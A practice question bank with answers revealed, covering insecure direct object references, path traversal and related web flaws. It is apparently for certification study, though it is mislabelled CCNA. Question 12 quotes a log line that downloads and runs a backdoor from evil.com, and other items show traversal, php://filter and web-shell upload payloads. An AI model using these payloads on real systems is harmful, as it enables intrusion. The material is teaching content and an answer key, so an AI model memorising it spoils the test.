Courseiva

CCNA Exploiting Insecure Web App References Questions

22 questions · Exploiting Insecure Web App References topic · All types, answers revealed

1
MCQmedium

An incident handler investigates a web application breach where an authenticated user modified a hidden form parameter containing an integer account ID, successfully viewing financial records belonging to other customers. Which underlying vulnerability class allowed this unauthorized data access?

A.Cross-Site Scripting via unsanitized parameter reflection in hidden inputs
B.Broken Authentication due to predictable session identifier generation
C.Insecure Direct Object References resulting from missing authorization checks on object identifiers
D.SQL Injection allowing arbitrary query execution via unsanitized numerical inputs
AnswerC

The application trusts the client-supplied account ID without verifying that the authenticated user owns that object, so tampering with the hidden parameter returns other customers' records. Authorisation must be enforced server-side against the session identity, not the submitted identifier.

Why this answer

Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input without verifying authorization. Attackers manipulate parameter values to access unauthorized resources, bypassing access controls entirely. Identifying this root cause is critical during incident response to properly scope data exposure, remediate broken access controls across the application architecture, and implement centralized authorization checks.

Exam trap

Candidates often confuse Insecure Direct Object References with Parameter Tampering, missing that parameter tampering is merely the attack mechanism rather than the architectural vulnerability allowing unauthorized access.

2
MCQmedium

A penetration tester is reviewing a Java-based e-commerce application. The product page URL is `https://shop.example.com/product?pid=1042`. When the tester changes `pid` to `1043`, the application returns the details of a different product. The tester then changes `pid` to `1043'` and receives a detailed Java stack trace in the HTTP response. Which type of vulnerability is most directly indicated by the stack trace, and what should the tester do next to confirm the impact?

A.Path traversal; the tester should replace `pid` with `../../../../etc/passwd` to read system files.
B.SQL injection; the tester should attempt to extract the database schema using UNION-based queries.
C.Insecure Direct Object Reference (IDOR); the tester should create a second user account and attempt to access the first user's orders.
D.Cross-site scripting (XSS); the tester should inject a script tag into the `pid` parameter and check if it executes in the browser.
AnswerB

The stack trace from a single quote in a numeric parameter is a classic indicator of SQL injection. The application likely concatenates the `pid` value directly into a SQL query. To confirm impact, the tester should craft payloads to retrieve database metadata, such as table names and user credentials, using UNION SELECT or error-based techniques.

Why this answer

The application returns a detailed Java stack trace when a single quote is appended to a numeric parameter, which is a hallmark of SQL injection. The tester should leverage this error to extract database information, confirming the vulnerability's severity. The other options describe different attack classes that do not match the observed server-side database error.

Exam trap

The trap here is assuming that any parameter manipulation that returns different data is IDOR, when a database error from a quote character clearly points to SQL injection.

3
MCQeasy

Which of the following is the most secure method for handling file references in a web application to prevent path traversal?

A.Sanitizing input by removing '..' sequences
B.Using indirect references via a database lookup
C.Encrypting the file path in the URL
D.Allowing only alphanumeric characters in the filename
AnswerB

Using indirect references decouples the user-supplied input from the actual file system path. By mapping a simple identifier to a specific file location on the back-end, the application ensures that users cannot influence the path resolution process. This is the recommended secure design pattern to prevent directory traversal and related attacks.

Why this answer

The most secure method is to use indirect references, such as a database lookup, where the user-supplied input maps to a predefined index or key. This prevents the user from ever providing a raw file path or directory structure to the server. By abstracting the file system, the application maintains complete control over which files are accessible, effectively eliminating the possibility of traversal attacks by design.

Exam trap

Candidates often choose input validation or sanitization, which are prone to bypasses, rather than the more robust architectural approach of indirect reference mapping via a secure database lookup.

4
MCQeasy

During a web application penetration test, you notice that a request to `/download?doc=8841` returns a PDF belonging to a different department. You change the value to `8842` and receive another department's document. The session cookie remains unchanged for both requests. Which conclusion best fits these observations?

A.The endpoint lacks object-level authorization, allowing any authenticated user to retrieve documents by changing the direct reference.
B.The numeric document identifiers are sequential and therefore guessable, which is the root cause of the cross-department access.
C.The session cookie is not bound to the document owner, so the application must regenerate it on every download to prevent cross-department access.
D.The download endpoint is missing a CSRF token, allowing an attacker to force the victim's browser to fetch arbitrary documents.
AnswerA

The same session retrieved two different departments' documents simply by incrementing a numeric parameter. That is the classic signature of an insecure direct object reference: the server accepts the client-supplied identifier and returns the object without verifying entitlement. The unchanged session cookie confirms the requests came from one identity, ruling out session confusion as the explanation.

Why this answer

Changing a numeric parameter returned a document belonging to another department under the same authenticated session. That demonstrates the server resolves the requested object and returns it without verifying the caller's entitlement. The remedy is object-level authorization: resolve the document, confirm the session principal may access it, and deny the request when that relationship is absent.

Exam trap

The trap here is concluding that sequential identifiers are the root cause, when the fundamental defect is the absence of a server-side ownership check on the requested object.

5
MCQeasy

A web application allows users to upload profile pictures. The upload functionality is handled by `upload.php`, which saves files to `/var/www/uploads/` and returns a URL like `https://example.com/uploads/username.jpg`. A security tester notices that the application does not validate the file type and that the upload directory is web-accessible. The tester uploads a file named `shell.php` containing PHP code and then navigates to `https://example.com/uploads/shell.php`. The server executes the PHP code. Which vulnerability has the tester exploited?

A.Insecure Direct Object Reference (IDOR) allowing access to other users' files.
B.Cross-site scripting (XSS) via uploaded image files.
C.Path traversal allowing access to files outside the web root.
D.Unrestricted file upload leading to remote code execution.
AnswerD

The application fails to validate the file type, allowing the tester to upload a PHP file that is then executed by the web server. This is a classic unrestricted file upload vulnerability that leads to remote code execution, as the attacker can run arbitrary commands on the server.

Why this answer

The tester uploaded a PHP file that the server executed, demonstrating remote code execution due to lack of file type validation. The other options describe different vulnerabilities: path traversal involves directory manipulation, IDOR involves unauthorized access to objects, and XSS involves client-side script injection. None of these match the server-side execution of an uploaded file.

Exam trap

The trap here is confusing file upload vulnerabilities with path traversal, when the key issue is the server executing an uploaded script.

6
MCQmedium

A penetration tester is assessing a RESTful API that manages user orders. The endpoint to retrieve an order is `GET /api/orders/{orderId}`. The tester, authenticated as user Alice, captures a request for her own order with `orderId=1001`. She then modifies the request to `orderId=1002` and receives the order details belonging to user Bob, including Bob's shipping address and items. The application did not check if the order belonged to Alice. Which type of vulnerability is this?

A.Cross-Site Request Forgery (CSRF)
B.SQL Injection
C.Insecure Direct Object Reference (IDOR)
D.Server-Side Request Forgery (SSRF)
AnswerC

IDOR occurs when an application exposes a reference to an internal object, such as a database key, and fails to verify that the requesting user is authorized to access that object. In this scenario, the orderId directly references an order, and the API does not check ownership, allowing Alice to access Bob's order by simply changing the ID. This is a classic horizontal privilege escalation via IDOR.

Why this answer

The tester modified the orderId parameter from her own order to another user's order and successfully retrieved data, indicating that the application does not verify whether the authenticated user owns the requested order. This is a direct object reference without proper authorization checks, which is the definition of IDOR. The other options describe different attack classes that do not match the observed behavior.

Exam trap

The trap here is assuming that because the API uses a numeric ID, the vulnerability must be SQL injection, but the key indicator is the successful access to another user's data by simply changing the ID without any injection syntax.

7
MCQhard

An application generates invoice PDFs on demand and caches them under `/var/app/cache/<userId>/<invoiceId>.pdf`. The download handler builds the path with `Paths.get(cacheRoot, userId, invoiceId + ".pdf")` and calls `Files.exists` before streaming. During an incident review, a crafted `invoiceId` value of `../../../../etc/hosts%00` produced a successful read. Which factor best explains why the containment check failed?

A.The application checks `Files.exists` before authentication completes, so unauthenticated users can probe arbitrary paths on the server.
B.The `Files.exists` call follows symbolic links by default, so an attacker can point the invoice path at a symlink outside the cache root.
C.The null byte was decoded before filesystem access, and the traversal segments were never canonicalized and compared against the cache root.
D.The per-user cache directory is writable by the application, so an attacker can overwrite the invoice file with the contents of the target file.
AnswerC

The payload combines traversal with a trailing null byte. If the decoder produces a NUL and the code concatenates before canonicalizing, the resulting path can escape the cache root, and the null may truncate the extension on platforms that honor it. Because no canonical containment check ran, `Files.exists` simply confirmed the escaped path and the file was streamed.

Why this answer

Path containment fails when the code concatenates user input, decodes it, and then checks the filesystem without canonicalizing the result. The traversal segments escape the cache root, and the trailing null byte can truncate the appended extension on affected platforms. The reliable pattern is to decode exactly once, reject null bytes and separators, canonicalize the resolved path, and confirm it still begins with the canonical cache root before any file operation.

Exam trap

The trap here is assuming that calling `Files.exists` on a constructed path provides safety, when existence checks say nothing about whether the path stayed inside the intended directory.

8
MCQmedium

An attacker manipulates a URL parameter `?file=invoice_123.pdf` to `?file=../../etc/passwd` on a web server. The application successfully returns the sensitive system file content. Which vulnerability is being exploited?

A.Cross-Site Request Forgery
B.Path Traversal
C.SQL Injection
D.Server-Side Request Forgery
AnswerB

Path Traversal exploits insufficient security validation of user-supplied input files. By injecting directory traversal sequences like double-dot-slash, attackers manipulate the server's file system path resolution. This allows unauthorized access to arbitrary files on the underlying operating system that should remain inaccessible to the web application process.

Why this answer

This scenario describes a Path Traversal attack, where an application fails to validate user input used to construct file system paths. By using dot-dot-slash notation, the attacker escapes the intended directory to access unauthorized files. This represents a critical failure in input validation and access control, commonly leading to full system compromise or sensitive data exposure, necessitating robust file path normalization and strictly defined allow-lists.

Exam trap

Candidates often confuse Path Traversal with Local File Inclusion (LFI). While related, they fail to identify the specific mechanism of escaping directories using '..' notation.

9
MCQhard

Which of the following is the most critical step to perform after detecting a successful IDOR exploit?

A.Restart the web server service
B.Audit access logs to assess the scope of data exposure
C.Block the attacker's IP address on the firewall
D.Rotate all user passwords in the system
AnswerB

IDOR vulnerabilities frequently allow mass data exfiltration. After detection, the priority is identifying how much data was accessed by the attacker. Analyzing access logs helps quantify the breach, allowing for an accurate impact assessment and compliance reporting, which are required when handling incidents that expose personal or sensitive organizational data.

Why this answer

The most critical step is to perform a comprehensive audit to determine the scope of unauthorized access. Since IDOR exploits are often automated, an attacker could have scraped the entire database. Identifying which user records were exposed is essential for compliance, incident reporting, and notifying affected parties.

Without a thorough impact assessment, you cannot quantify the damage or ensure the vulnerability has not been used to exfiltrate bulk sensitive data.

Exam trap

Students mistakenly prioritize shutting down the entire web server or rotating all administrator passwords immediately, rather than first determining the specific breach scope via logs.

10
Multi-Selectmedium

A financial services company is hardening a REST API that returns account statements. Each request includes a numeric `accountId`, and the API currently returns the statement whenever the `accountId` exists. The security team wants to close the insecure direct object reference exposure without redesigning the data model. Which two controls, applied together, most directly address the flaw? (Choose two.)

Select 2 answers
A.Increase the account identifier length from six digits to a random 128-bit value so that account numbers cannot be enumerated.
B.Require TLS 1.3 with mutual authentication between the mobile client and the API gateway for every statement request.
C.Derive the account identifier from the authenticated session context instead of trusting the client-supplied `accountId`.
D.After resolving the requested account, verify that the authenticated user is an owner or authorized delegate of that account before returning the statement.
E.Log every statement request with the account identifier and alert when a single session requests more than one distinct account.
AnswersC, D

When the server resolves the account from the session rather than the request body or query string, the client cannot name an object it does not own. This removes the attacker's ability to substitute another account number. It is a direct structural fix for the reference flaw because the object selection is bound to the authenticated principal before any data is returned.

Why this answer

The exposure exists because the API trusts a client-supplied identifier and never checks entitlement. Binding the account to the authenticated session removes the attacker's ability to name arbitrary objects, and an explicit ownership or delegation check catches legitimate cases where identifiers must be supplied. Together these enforce object-level authorization on every request, which is the durable fix for insecure direct object references.

Exam trap

The trap here is treating identifier randomization or transport security as an authorization control, when neither prevents an authenticated user from naming and retrieving an object they do not own.

11
MCQmedium

A web application serves user-uploaded documents through a request to `/api/v1/documents/{docGuid}`. The `docGuid` is a version 4 UUID that appears unguessable, and the API returns the document for any authenticated user who supplies a valid GUID. During an incident-handling review, you note that the GUID is also exposed in a public activity feed that lists recent uploads. What is the most significant reference-handling weakness in this design?

A.The API should hash each GUID with SHA-256 before returning it so that clients cannot correlate documents.
B.The version 4 UUID does not contain a timestamp, so the application cannot determine when the document was created.
C.The application relies on the UUID's unguessability for authorization instead of verifying that the requesting user owns the document.
D.The activity feed should use a POST request instead of a GET request to hide the GUIDs from intermediaries.
AnswerC

Unpredictable identifiers are not an access control mechanism. Because the API never checks ownership, any authenticated user who obtains a GUID from the public activity feed can retrieve another user's document. This is the defining property of an insecure direct object reference: the object reference itself functions as the authorization decision, which breaks as soon as the reference leaks.

Why this answer

The API treats the document GUID as a bearer credential for the object. Because the GUID is disclosed in a public feed, any authenticated user can collect references and retrieve documents belonging to others. Secure designs must resolve the reference to an object and then verify the authenticated principal is entitled to it, rather than assuming an unguessable identifier is sufficient protection.

Exam trap

The trap here is assuming that a random, unguessable identifier such as a version 4 UUID is itself a security control that prevents insecure direct object reference attacks.

12
MCQhard

A security incident responder is analyzing a web server compromise. The attacker gained initial access through a vulnerable web application and then executed a command to download a tool from a remote server. The responder finds the following in the web server logs: `GET /cgi-bin/printenv?QUERY_STRING=%3Bwget%20http%3A%2F%2Fevil.com%2Fbackdoor%20-O%20%2Ftmp%2Fbd%3Bchmod%20%2Bx%20%2Ftmp%2Fbd%3B%2Ftmp%2Fbd`. The responder needs to identify the specific technique used and the appropriate containment step. Which of the following best describes the technique and the immediate containment action?

A.Cross-site scripting; sanitize the `QUERY_STRING` parameter and notify users of potential cookie theft.
B.Insecure Direct Object Reference; change the object references in the application and implement access controls.
C.SQL injection; review database logs and apply input validation to the `QUERY_STRING` parameter.
D.Shellshock exploitation; isolate the server by removing it from the network and preserve volatile evidence before patching Bash.
AnswerD

The payload exploits the Shellshock vulnerability (CVE-2014-6271) in the `printenv` CGI script. The `QUERY_STRING` contains a semicolon followed by commands, which are executed by the vulnerable Bash. The immediate containment is to isolate the server to prevent further compromise, preserve volatile evidence (memory, network connections), and then patch Bash.

Why this answer

The log entry shows a Shellshock exploit against the `printenv` CGI script, where commands in the `QUERY_STRING` are executed by Bash. The immediate containment is to isolate the server to prevent lateral movement, preserve volatile evidence, and then patch the Bash vulnerability. The other options misidentify the attack as SQL injection, XSS, or IDOR, none of which involve shell command execution.

Exam trap

The trap here is misinterpreting the semicolon-separated commands as SQL injection when they are actually shell commands executed by a vulnerable CGI script.

13
MCQmedium

A security engineer is reviewing a web application that uses a parameter `account` to retrieve account details. The parameter value is a base64-encoded string of the account number, such as `YWNjb3VudD0xMjM0`. An attacker decodes the string, changes the account number, re-encodes it, and successfully accesses another user's account. Which of the following is the most likely reason this attack succeeded?

A.The application uses weak encryption that can be broken.
B.The application fails to validate the input length, allowing buffer overflow.
C.The application relies on obfuscation instead of proper access control.
D.The application uses a predictable session token that can be guessed.
AnswerC

Base64 encoding is not encryption; it is easily reversible. The application likely assumes that encoding the account number obscures it, but without server-side authorization checks, an attacker can decode, modify, and re-encode the value. The success indicates that the application does not verify that the authenticated user owns the requested account, relying solely on the obscurity of the parameter.

Why this answer

The application uses base64 encoding to obfuscate the account number but fails to enforce access control. An attacker can easily decode the parameter, change the account number, and re-encode it. The success of the attack shows that the application relies on the obscurity of the parameter rather than verifying that the authenticated user owns the account.

This is a form of IDOR where the direct object reference is encoded.

Exam trap

The trap here is assuming that encoding or encrypting an identifier provides security, when in fact authorization checks are still required to prevent IDOR.

14
Multi-Selecthard

A security analyst is reviewing a web application that uses a parameter `doc_id` to retrieve documents from a database. The application does not validate that the requested document belongs to the authenticated user. During an incident response, the analyst observes multiple requests with sequential `doc_id` values from a single IP address. Which TWO of the following actions should the analyst take to confirm and mitigate the IDOR vulnerability? (Choose two.)

Select 2 answers
A.Replay the requests with a different user session to verify if unauthorized access is possible.
B.Rate-limit requests from the suspicious IP address to stop the enumeration.
C.Obfuscate the `doc_id` parameter by base64-encoding it to prevent enumeration.
D.Implement a server-side check that compares the authenticated user's ID with the owner ID of the requested document.
E.Enable detailed error messages to help developers debug the issue.
AnswersA, D

Replaying the requests with another user's session tests whether the application enforces object-level authorization. If the second user can access documents belonging to the first user, it confirms IDOR. This is a standard validation step because it isolates the authorization check from other factors like session validity.

Why this answer

To confirm IDOR, the analyst should test with a different user session to see if unauthorized access occurs. To mitigate, the application must enforce server-side authorization checks that verify the authenticated user owns the requested document. These two actions address both validation and remediation.

Obfuscation, error messages, and rate-limiting do not fix the root cause.

Exam trap

The trap here is confusing obfuscation with security; encoding an identifier does not prevent IDOR if authorization checks are missing.

15
Multi-Selectmedium

Which TWO of the following practices are the most effective at mitigating Insecure Direct Object Reference (IDOR) vulnerabilities?

Select 2 answers
A.Implementing server-side authorization checks for every object access
B.Using random, non-sequential identifiers for objects
C.Increasing the length of session tokens
D.Employing a Web Application Firewall (WAF)
E.Moving all sensitive data to a cloud storage bucket
AnswersA, B

Verifying that the current authenticated user has explicit permission to access the requested object is the definitive mitigation for IDOR. Without this server-side validation, users can simply modify request parameters to view data belonging to other users, rendering any other security control ineffective against logical authorization bypasses.

Why this answer

Mitigating IDOR requires shifting from user-controlled identifiers to server-side access control checks. Relying on unpredictable identifiers makes guessing harder, but verifying identity and authorization for every requested object is the primary defense. These practices ensure that even if an attacker discovers a valid ID, they lack the authorization to perform operations on the underlying data, thereby closing the logical gap that allows unauthorized object access.

Exam trap

Candidates often select 'hiding' techniques like encoding IDs as a primary mitigation. They fail to realize that only server-side authorization checks provide true protection against unauthorized object access.

16
MCQhard

An application uses a Base64 encoded string as a parameter for object references. An attacker decodes the string, modifies the ID, re-encodes it, and successfully accesses unauthorized data. Why did the security control fail?

A.Base64 encoding is inherently reversible
B.The server failed to enforce HTTPS
C.The session token was not included in the payload
D.The application used an insecure hashing algorithm
AnswerA

Base64 is a reversible encoding scheme, not an encryption method. Attackers can easily decode and modify the payload before re-encoding it. The security failure stems from the reliance on this 'obfuscation' instead of implementing robust server-side authorization checks to verify if the user is permitted to access the modified ID.

Why this answer

The failure occurred because the application relied on encoding (Base64) as a security control instead of proper authorization logic. Encoding is a data representation technique, not a security mechanism. Because the server failed to perform access control checks on the decoded identifier, it allowed the attacker to bypass the intended security model.

This highlights the importance of never confusing data format obfuscation with actual authorization or identity management.

Exam trap

Candidates frequently mistake encoding (like Base64) for encryption or a security control, failing to realize that reversible data formats provide zero protection against unauthorized access if authorization checks are missing.

17
MCQeasy

A web application allows users to download files by specifying a filename in the URL, such as `download?file=report.pdf`. An attacker changes the parameter to `download?file=../../../../etc/passwd` and successfully retrieves the system's password file. Which of the following best describes this attack?

A.Remote File Inclusion (RFI)
B.Insecure Direct Object Reference (IDOR)
C.Cross-Site Scripting (XSS)
D.Path Traversal
AnswerD

The attacker uses `../` sequences to navigate outside the intended directory and access a system file. This is the definition of Path Traversal, also known as directory traversal. The application fails to sanitize the file path, allowing access to files outside the web root. The success of retrieving `/etc/passwd` confirms the vulnerability.

Why this answer

The attacker manipulates the `file` parameter with `../` sequences to escape the intended directory and read a system file. This is a classic Path Traversal attack. The application fails to validate or sanitize the user-supplied path, allowing access to files outside the web root.

The successful retrieval of `/etc/passwd` demonstrates the vulnerability.

Exam trap

The trap here is confusing Path Traversal with IDOR, but IDOR involves accessing objects by reference, not navigating the file system with directory traversal sequences.

18
MCQeasy

Which of the following describes the core difference between Path Traversal and IDOR?

A.Path Traversal is an OS-level vulnerability, while IDOR is an application-level flaw
B.IDOR is only applicable to RESTful APIs
C.Path Traversal is only possible on Windows systems
D.IDOR is a subtype of Path Traversal
AnswerA

Path traversal directly affects the server's file system, making it an OS-level concern. IDOR is a logic flaw within the application's authorization implementation, where the application fails to distinguish between users when accessing data objects in its database. This structural difference dictates how each must be tested and remediated.

Why this answer

Path Traversal targets the file system by manipulating paths to access arbitrary files, whereas IDOR targets application data by manipulating identifiers to access unauthorized database objects. While both involve parameter tampering, they operate at different layers: Path Traversal interacts with the underlying OS file structure, while IDOR interacts with the application's data model. Understanding this distinction is key to selecting the appropriate remediation strategy for each specific vulnerability.

Exam trap

Candidates often confuse the operating system layer of file paths with the database application layer of object identifiers, assuming both vulnerabilities operate identically.

19
MCQmedium

When auditing an application for Insecure Direct Object References, why is it recommended to perform tests using two distinct user accounts?

A.To verify if the server is load balanced
B.To ensure that session cookies are not reused
C.To confirm that the application does not validate object ownership
D.To test the strength of the password hashing
AnswerC

By logging in as User A and attempting to access an object owned by User B, the auditor confirms if the application performs authorization checks. If the request succeeds, it proves the system only validates the session, not the ownership of the referenced object, confirming the IDOR flaw.

Why this answer

Testing with two accounts allows the auditor to verify if User A can access User B's resources using the same identifiers. This 'cross-account' test is the gold standard for confirming an IDOR vulnerability. It isolates the logic flaw by demonstrating that the application fails to validate ownership, proving that access control is tied only to authentication rather than granular authorization, which is a critical finding for secure development.

Exam trap

Candidates frequently assume testing requires guessing complex passwords or bypassing authentication mechanisms entirely, missing the specific utility of multi-account cross-referencing.

20
MCQmedium

A penetration tester discovers that a web application uses a predictable numeric parameter `user_id` in the URL to retrieve user profiles. While authenticated as user 1001, the tester changes the parameter to 1002 and successfully views another user's profile. The application does not perform any additional authorization checks beyond verifying the session. Which of the following best describes the vulnerability and its immediate impact?

A.Vertical privilege escalation due to missing role-based access control
B.SQL injection because the user_id parameter is likely used in a database query
C.Cross-Site Request Forgery (CSRF) enabling unauthorized actions
D.Insecure Direct Object Reference (IDOR) allowing horizontal privilege escalation
AnswerD

Changing `user_id` from 1001 to 1002 accesses another user's profile at the same privilege level, which is horizontal privilege escalation. The application fails to verify that the authenticated user owns the requested object, which is the definition of IDOR. This is the correct characterization because the attacker is not elevating to an admin role but accessing peer data.

Why this answer

The application trusts the client-supplied `user_id` without verifying that the authenticated user is authorized to access that object. By changing the identifier to another user's ID, the attacker accesses data belonging to a peer, which is horizontal privilege escalation. This is a classic IDOR because the reference to the object is direct and predictable, and the application lacks an access control check on the object level.

Exam trap

The trap here is assuming that because the parameter is numeric and predictable, the vulnerability must be SQL injection, when the real issue is missing object-level authorization.

21
Multi-Selecthard

A security analyst is investigating a suspected local file inclusion (LFI) attack against a PHP web application. The web server logs show the following request: `GET /download.php?file=php://filter/convert.base64-encode/resource=index.php`. The analyst needs to determine the attacker's objective and the potential impact. (Choose two.)

Select 2 answers
A.The attacker is attempting to read the source code of `index.php` by encoding it in Base64 to bypass PHP execution.
B.The attacker is attempting to retrieve the contents of a sensitive file, such as `/etc/passwd`, by including it directly.
C.The attacker is attempting to perform a cross-site request forgery (CSRF) attack against the web application.
D.The attacker is attempting to execute arbitrary commands on the server via the `file` parameter.
E.The attacker is exploiting a vulnerability that could lead to disclosure of application source code, potentially revealing database credentials.
AnswersA, E

The `php://filter` wrapper with `convert.base64-encode` is a known technique to read PHP source code. Normally, including a PHP file would execute it, but by Base64-encoding the output, the attacker can view the raw source, which may contain sensitive logic or credentials. This is a direct objective of the attack.

Why this answer

The payload uses the `php://filter` wrapper with Base64 encoding to read the source code of `index.php`. This technique bypasses PHP execution, allowing the attacker to view the raw code, which may contain sensitive information like database credentials. The other options misidentify the objective, such as command execution or CSRF, which are not supported by the specific payload.

Exam trap

The trap here is assuming that any file inclusion attack aims to read `/etc/passwd`, when the use of `php://filter` specifically targets PHP source code.

22
MCQmedium

How can an application distinguish between an authorized user requesting their own profile and an unauthorized user attempting to access a different profile via IDOR?

A.By validating that the user has a session cookie
B.By checking if the resource ID is a valid integer
C.By verifying ownership of the requested resource in the backend
D.By using a CAPTCHA on every request
AnswerC

Verifying ownership is the correct approach to prevent IDOR. The application must check that the currently authenticated user's identifier matches the owner ID of the requested resource. This server-side check ensures that users can only access their own data, effectively blocking unauthorized requests for objects belonging to other users.

Why this answer

The application must correlate the authenticated user's identity (from the session) with the requested resource identifier on the back-end. By checking if the session user owns the requested resource ID before returning data, the application enforces authorization. This moves the logic from 'is this user allowed to access anything?' to 'is this user allowed to access THIS SPECIFIC object?', which is the foundation of secure resource access control.

Exam trap

Test-takers frequently believe that strong session tokens or multifactor authentication alone are sufficient to automatically prevent IDOR without backend code logic changes.

Ready to test yourself?

Try a timed practice session using only Exploiting Insecure Web App References questions.